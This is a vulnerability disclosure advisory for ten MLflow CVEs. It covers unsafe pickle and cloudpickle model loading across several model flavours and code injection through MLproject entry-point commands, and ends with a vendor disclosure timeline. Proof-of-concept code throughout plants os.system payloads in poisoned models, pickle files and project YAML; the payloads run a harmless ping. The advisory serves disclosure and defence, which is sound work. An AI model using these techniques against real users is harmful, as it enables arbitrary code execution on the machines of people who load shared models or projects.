June 4, 2024
Cloudpickle and Pickle Load on Sklearn Model Load Leading to Code Execution
CVE Number
CVE-2024-37052
CVE-2024-37053
Summary
A deserialization vulnerability exists within the sklearn/__init__.py file, within the function _load_model_from_local_file. An attacker can inject a malicious pickle object into a model file on upload, which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 1.1.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the sklearn/__init__.py file, within the function _load_model_from_local_file, which is invoked when mlflow.sklearn.load_model is called.
def _load_model_from_local_file(path, serialization_format):
    ...
    with open(path, "rb") as f:
        ...
        if serialization_format == SERIALIZATION_FORMAT_PICKLE:
            return pickle.load(f)
        elif serialization_format == SERIALIZATION_FORMAT_CLOUDPICKLE:
            import cloudpickle

            return cloudpickle.load(f)
An attacker can exploit this by injecting into a model a pickle object that will execute arbitrary code when deserialized. The attacker can then call the mlflow.sklearn.log_model() function to serialize this model and log it to the tracking server. By default, cloudpickle.load is used to deserialize the model when it is loaded. The serialization format can instead be set to 'pickle' when the model is logged, forcing the use of pickle.load() when the model is loaded. In the below example, the pickle object has been injected into the __init__ method of the ElasticNet class.
with mlflow.start_run():
    lr = ElasticNet(alpha=alpha, l1_ratio=l1_ratio, random_state=42)
    lr.fit(train_x, train_y)
    ...
    # Either upload the model, which will use the default format of cloudpickle
    mlflow.sklearn.log_model(lr, artifact_path="model", registered_model_name="SklearnPickleDefault")
    # Or upload the model and set the serialization format to pickle
    mlflow.sklearn.log_model(
        lr,
        artifact_path="model",
        registered_model_name="SklearnPickleDefault",
        serialization_format="pickle",
    )
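The malicious object itself is not shown in the snippet above. As a purely hypothetical sketch, mirroring the RunCommand payload used in the examples later in this post, the attacker's patched ElasticNet.__init__ in a local copy of scikit-learn might look like:

# Hypothetical sketch: payload injected into ElasticNet.__init__ in the
# attacker's local copy of scikit-learn
class ElasticNet:
    def __init__(self, alpha=1.0, l1_ratio=0.5, random_state=None):
        import os

        class RunCommand:
            # pickle stores the (os.system, args) pair returned by __reduce__
            # and invokes it when the object is deserialized
            def __reduce__(self):
                return (os.system, ('ping -c 4 8.8.8.8',))

        self.command = RunCommand()  # serialized along with the fitted model
        # ... original initialization continues ...

Because __reduce__ returns a callable and its arguments, the payload fires under both pickle.load() and cloudpickle.load().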
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/SklearnPickleDefault/1"
loaded_model = mlflow.sklearn.load_model(logged_model, dst_path='/tmp/sklearn_model')
Cloudpickle Load on PyFunc Model Load Leading to Code Execution
CVE Number
CVE-2024-37054
Summary
A deserialization vulnerability exists within the mlflow/pyfunc/model.py file, within the function _load_pyfunc. An attacker can inject a malicious pickle object into a model file on upload, which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 0.9.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the mlflow/pyfunc/model.py file, within the function _load_context_model_and_signature, which is invoked when mlflow.pyfunc.load_model is called.
def _load_context_model_and_signature(
    model_path: str, model_config: Optional[Dict[str, Any]] = None
):
    ...
    with open(os.path.join(model_path, python_model_subpath), "rb") as f:
        python_model = cloudpickle.load(f)
An attacker can exploit this by creating a wrapper for a pmdarima model that contains malicious code and using mlflow.pyfunc.log_model() to log it to the target MLflow server.
class PmdarimaWrapper(mlflow.pyfunc.PythonModel):
    def __init__(self):
        import os

        class RunCommand:
            def __reduce__(self):
                return (os.system, ('ping -c 4 8.8.8.8',))

        self.command = RunCommand()

...

# Log the model
with mlflow.start_run():
    wrapper = PmdarimaWrapper()
    mlflow.pyfunc.log_model(
        artifact_path="model",
        python_model=wrapper,
        registered_model_name="PyfuncPickleTest",
    )
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/PyfuncPickleTest/1"
loaded_model = mlflow.pyfunc.load_model(logged_model, dst_path='/tmp/pyfunc_model')
Pickle Load on Pmdarima Model Load Leading to Code Execution
CVE Number
CVE-2024-37055
Summary
A deserialization vulnerability exists within the pmdarima/__init__.py file, within the function _load_model. An attacker can inject a malicious pickle object into a model file on upload, which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 1.24.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the pmdarima/__init__.py file, within the function _load_model, which is invoked when mlflow.pmdarima.load_model is called.
def _load_model(path):
    with open(path, "rb") as pickled_model:
        return pickle.load(pickled_model)
An attacker can exploit this by injecting into a model a pickle object that will execute arbitrary code when deserialized. The attacker can then call the mlflow.pmdarima.log_model() function to serialize this model and log it to the tracking server. In the below example, the malicious pickle object has been injected into the __init__ method of the _PmdarimaModelWrapper class in the file pmdarima/__init__.py, which is called through the auto_arima function. Before logging the model, the attacker must also edit the save_model function to force MLflow to pickle their model.
with mlflow.start_run():
    # Create the model
    model = pmdarima.auto_arima(train["sales"], seasonal=True, m=12)
    ...
    # Log model
    mlflow.pmdarima.log_model(model, ARTIFACT_PATH, registered_model_name="PmdarimaTestModel")
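The injection itself is not visible above. A minimal, hypothetical sketch of the patched wrapper in the attacker's local copy of mlflow/pmdarima/__init__.py (surrounding code elided) might be:

# Hypothetical sketch: payload injected into _PmdarimaModelWrapper.__init__
# in the attacker's local copy of mlflow/pmdarima/__init__.py
class _PmdarimaModelWrapper:
    def __init__(self, pmdarima_model):
        import os

        class RunCommand:
            # Reconstructed via os.system when the pickle is loaded
            def __reduce__(self):
                return (os.system, ('ping -c 4 8.8.8.8',))

        self.command = RunCommand()  # pickled alongside the wrapped model
        self.pmdarima_model = pmdarima_model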
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/PmdarimaTestModel/1"
loaded_model = mlflow.pmdarima.load_model(logged_model, dst_path='/tmp/pmdarima_model')
Cloudpickle Load on LightGBM Scikit-Learn Model Load Leading to Code Execution
CVE Number
CVE-2024-37056
Summary
A deserialization vulnerability exists within the mlflow/lightgbm/__init__.py file, within the function _load_model. An attacker can inject a malicious pickle object into a model file on upload, which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 1.23.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the mlflow/lightgbm/__init__.py file, within the function _load_model, which is invoked when mlflow.lightgbm.load_model is called.
def _load_model(path):
    ...
    if model_class == "lightgbm.basic.Booster":
        import lightgbm as lgb

        model = lgb.Booster(model_file=lgb_model_path)
    else:
        # LightGBM scikit-learn models are deserialized using Cloudpickle.
        import cloudpickle

        with open(lgb_model_path, "rb") as f:
            model = cloudpickle.load(f)
An attacker can exploit this by injecting into a LightGBM scikit-learn model a pickle object that will execute arbitrary code when deserialized. The attacker can then call the mlflow.lightgbm.log_model() function to serialize this model and log it to the tracking server. In the below example, the malicious pickle object has been injected into the __init__ method of the LGBMModel class within the lightgbm/sklearn.py file.
# Create and train a LightGBM model
model = lgb.LGBMClassifier()
model.fit(X_train, y_train)

...

# Start an MLflow run
with mlflow.start_run():
    ...
    # Log the LightGBM model
    mlflow.lightgbm.log_model(model, "model", registered_model_name="LightGBMSklearnPickle")
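As in the previous examples, the payload does not appear in the logging code. A hypothetical sketch of the patched __init__ in the attacker's local copy of lightgbm/sklearn.py might be:

# Hypothetical sketch: payload injected into LGBMModel.__init__ in the
# attacker's local copy of lightgbm/sklearn.py
class LGBMModel:
    def __init__(self, *args, **kwargs):
        import os

        class RunCommand:
            # Invoked via os.system when the cloudpickle payload is deserialized
            def __reduce__(self):
                return (os.system, ('ping -c 4 8.8.8.8',))

        self.command = RunCommand()  # cloudpickled with the trained model
        # ... original initialization continues ...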
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/LightGBMSklearnPickle/1"
loaded_model = mlflow.lightgbm.load_model(logged_model, dst_path='/tmp/lightgbm_model')
Cloudpickle Load on TensorFlow Keras Model Load Leading to Code Execution
CVE Number
CVE-2024-37057
Summary
A deserialization vulnerability exists within the mlflow/tensorflow/__init__.py file, within the function _load_custom_objects. An attacker can inject a malicious pickle object into a model file on upload, which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 2.0.0rc0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
This vulnerability exists within the mlflow/tensorflow/__init__.py file, within the function _load_custom_objects, which is invoked when mlflow.tensorflow.load_model is called.
def _load_custom_objects(path, file_name):
    custom_objects_path = None
    if os.path.isdir(path):
        if os.path.isfile(os.path.join(path, file_name)):
            custom_objects_path = os.path.join(path, file_name)
    if custom_objects_path is not None:
        import cloudpickle

        with open(custom_objects_path, "rb") as f:
            return cloudpickle.load(f)
An attacker can exploit this by creating a custom function containing a pickle object that will execute arbitrary code when deserialized, and passing it via the custom_objects parameter when calling mlflow.tensorflow.log_model() to log the model to the server.
# Add the custom object to be pickled
def create_pickle():
    import os

    class RunCommand:
        def __reduce__(self):
            return (os.system, ('ping -c 4 8.8.8.8',))

    return RunCommand()

...

# Build and Compile the Model
model = Sequential([
    Dense(10, activation='relu', input_shape=(4,)),
    Dense(10, activation='relu'),
    Dense(3, activation='softmax'),
])

...

# Log the Model
with mlflow.start_run():
    mlflow.tensorflow.log_model(
        model,
        "model",
        custom_objects={'PickleFunction': create_pickle()},
        registered_model_name="TensorFlowKerasPickle",
    )
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/TensorFlowKerasPickle/1"
loaded_model = mlflow.tensorflow.load_model(logged_model, dst_path='/tmp/tensorflow_model')
Cloudpickle Load on Langchain AgentExecutor Model Load Leading to Code Execution
CVE Number
CVE-2024-37058
Summary
A deserialization vulnerability exists within the mlflow/langchain/utils.py file, within the function _load_from_pickle. An attacker can inject a malicious pickle object into a model file on upload, which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 2.5.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the mlflow/langchain/utils.py file, within the function _load_from_pickle, which is invoked when mlflow.langchain.load_model is called.
def _load_from_pickle(path):
    with open(path, "rb") as f:
        return cloudpickle.load(f)
An attacker can exploit this by building an AgentExecutor with Tools specially crafted to trigger the below elif statement within the _save_base_lcs function of the same utils.py file. The attacker could alter the code within this method, crafting a pickle object that will execute arbitrary code when deserialized and passing it to cloudpickle.dump().
elif isinstance(model, langchain.agents.agent.AgentExecutor):
    ...
    if model.tools:
        tools_data_path = os.path.join(path, _TOOLS_DATA_FILE_NAME)
        try:
            class RunCommand:
                def __reduce__(self):
                    return (os.system, ('ping -c 4 8.8.8.8',))

            command = RunCommand()
            with open(tools_data_path, "wb") as f:
                cloudpickle.dump(command, f)
This model can then be logged to the server at the specified tracking URI by calling the mlflow.langchain.log_model() function.
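A minimal sketch of that logging step, assuming an AgentExecutor named agent built as described above and a placeholder tracking URI:

# Hypothetical sketch: logging the crafted AgentExecutor so the poisoned
# tools pickle is uploaded to the tracking server
import mlflow

mlflow.set_tracking_uri("http://tracking-server:5000")  # placeholder URI

with mlflow.start_run():
    mlflow.langchain.log_model(
        agent,  # the AgentExecutor built with specially crafted Tools
        artifact_path="model",
        registered_model_name="LangchainPickle",
    )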
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/LangchainPickle/1"
loaded_model = mlflow.langchain.load_model(logged_model, dst_path='/tmp/langchain_model')
Cloudpickle Load on PyTorch Model Load Leading to Code Execution
CVE Number
CVE-2024-37059
Summary
A deserialization vulnerability exists within the mlflow/pytorch/__init__.py file, within the function _load_model. An attacker can inject a malicious pickle object into a model file on upload, which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 0.5.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
This vulnerability exists within the mlflow/pytorch/__init__.py file, within the function _load_model, which is invoked when mlflow.pytorch.load_model is called.
def _load_model(path, device=None, **kwargs):
    import torch
    ...
    if Version(torch.__version__) >= Version("1.5.0"):
        pytorch_model = torch.load(model_path, **kwargs)
    else:
        try:
            pytorch_model = torch.load(model_path, **kwargs)
An attacker can exploit this by injecting into a PyTorch model, at build time, a pickle object that will execute arbitrary code when deserialized. When the specially crafted PyTorch model is logged with MLflow, it is serialized via PyTorch's torch.save function. It is then deserialized during model load, as the _load_model function calls PyTorch's torch.load function, leading to the execution of the arbitrary code on the victim machine.
class SimpleNet(nn.Module):
    def __init__(self, input_size, hidden_size, num_classes):
        ...
        import os

        class RunCommand:
            def __reduce__(self):
                return (os.system, ('ping -c 4 8.8.8.8',))

        self.command = RunCommand()

...

model = SimpleNet(input_size, hidden_size, num_classes)
with mlflow.start_run():
    mlflow.pytorch.log_model(model, "model", registered_model_name="PytorchTest")
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/PytorchTest/1"
loaded_model = mlflow.pytorch.load_model(logged_model, dst_path='/tmp/pytorch_model')
Pickle Load on Recipe Run Leading to Code Execution
CVE Number
CVE-2024-37060
Summary
A deserialization vulnerability exists within the recipes/cards/__init__.py file, within the class BaseCard, in the static method load. An attacker can create an MLProject Recipe containing a malicious pickle file (e.g. recipe_card.pkl) and a Python script that calls BaseCard.load("recipe_card.pkl"). The pickle file will be deserialized when the project is run, leading to execution of the arbitrary code on the victim machine.
Products Impacted
This vulnerability was introduced in version 1.27.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the recipes/cards/__init__.py file within the class BaseCard, in the static method load.
@staticmethod
def load(path):
    if os.path.isdir(path):
        path = os.path.join(path, CARD_PICKLE_NAME)
    with open(path, "rb") as f:
        return pickle.load(f)
An attacker can exploit this by creating an MLProject Recipe containing a pickle file that will execute arbitrary code when deserialized, along with code that calls BaseCard.load("recipe_card.pkl"), pointing to the malicious pickle file, as shown below. The attacker could share this project with a victim, and when they attempt to run it, the pickle file will be deserialized and the arbitrary code executed on their machine.
An example MLproject file:
name: RecipeTestingProject
conda_env: conda.yaml
entry_points:
  main:
    command: "python recipe_card_pickle.py"
The snippet from the recipe_card_pickle.py file that is responsible for calling the vulnerable function when the victim runs mlflow run . from within the recipe directory:
r = Recipe(profile="local")
r.run("ingest")
BaseCard.load("recipe_card.pkl")
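For completeness, a hypothetical sketch of how the attacker might generate the malicious recipe_card.pkl shipped inside the project directory:

# Hypothetical sketch: generating the malicious recipe_card.pkl that
# BaseCard.load() will deserialize when the project is run
import os
import pickle

class RunCommand:
    # pickle stores the (os.system, args) pair and calls it on load
    def __reduce__(self):
        return (os.system, ('ping -c 4 8.8.8.8',))

with open("recipe_card.pkl", "wb") as f:
    pickle.dump(RunCommand(), f)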
Remote Code Execution on Local System via MLproject YAML File
CVE Number
CVE-2024-37061
Summary
A code injection vulnerability exists within the ML Project run procedure in the _run_entry_point function, within the projects/backend/local.py file. An attacker can package an MLflow Project where the MLproject main entrypoint command contains arbitrary code (or an operating system appropriate command), which will be executed on the victim machine when the project is run.
Products Impacted
This vulnerability was introduced in version 1.11.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-94: Improper Control of Generation of Code (‘Code Injection’).
Details
The vulnerability exists within the ML Project run procedure in the _run_entry_point function, within the projects/backend/local.py file.
def _run_entry_point(command, work_dir, experiment_id, run_id):
    ...
    if os.name != "nt":
        process = subprocess.Popen(["bash", "-c", command], close_fds=True, cwd=work_dir, env=env)
    else:
        process = subprocess.Popen(["cmd", "/c", command], close_fds=True, cwd=work_dir, env=env)
An attacker can exploit this by creating an MLflow Project where the MLproject main entrypoint command contains arbitrary code (or an operating system appropriate command). The attacker could share this project with a victim, and when the victim runs mlflow run . from within the project directory, the code will be executed on the victim machine.
An example MLproject file:
name: RecipeTestingProject
conda_env: conda.yaml
entry_points:
  main:
    command: "python -c 'import os; os.system(\"ping -c 4 8.8.8.8\")'"
Timeline
December 20, 2023 — vendor disclosure via process outlined in SECURITY.md
January 15, 2024 — follow up email sent to vendor
January 29, 2024 — follow up email sent to vendor
February 13, 2024 — followed up with vendor over LinkedIn
February 22, 2024 — followed up with vendor over LinkedIn
February 27, 2024 — vendor acknowledged receipt
March 04, 2024 — follow up email sent to vendor
March 18, 2024 — follow up email sent to vendor
March 19, 2024 — grace period for response and patching passed
March 21, 2024 — followed up with vendor over LinkedIn
May 30, 2024 — followed up with vendor letting them know we plan to publish on 04 June 2024
June 04, 2024 — public disclosure